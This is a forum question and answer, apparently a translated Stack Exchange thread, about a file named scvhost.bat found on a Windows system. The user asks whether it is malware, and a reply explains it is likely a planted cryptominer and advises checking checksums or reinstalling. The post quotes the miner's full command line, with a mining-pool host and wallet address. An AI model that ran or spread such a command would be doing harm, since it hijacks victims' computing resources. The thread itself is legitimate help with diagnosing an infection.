New*_*mer 17 windows malware batch-file cryptomining
我刚刚找到了这个名为 scvhost.bat 的 .bat 文件。该文件中有以下内容:
scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02
这是病毒(窃取信息等)还是种植矿工?我很担心,因为我也涉足加密货币,并且stratum是上述文件中提到的货币。
mta*_*tak 34
这似乎是某种矿工,特别是因为该参数包含指向矿池的 URL。但是,您需要确定二进制文件中的内容。将您在系统中找到的二进制文件的校验和与矿工开发团队发布的版本进行比较是有意义的。如果它们不同;认为您的系统不安全。
另一个问题是您发现了这个矿工(可能是因为它使用了大量 CPU),但您不知道系统上还发生了什么。如果入侵者可以启动矿机,他们也可以启动其他东西。从备份中恢复或进行全新安装可能是个好主意。
| 归档时间: |
|
| 查看次数: |
3727 次 |
| 最近记录: |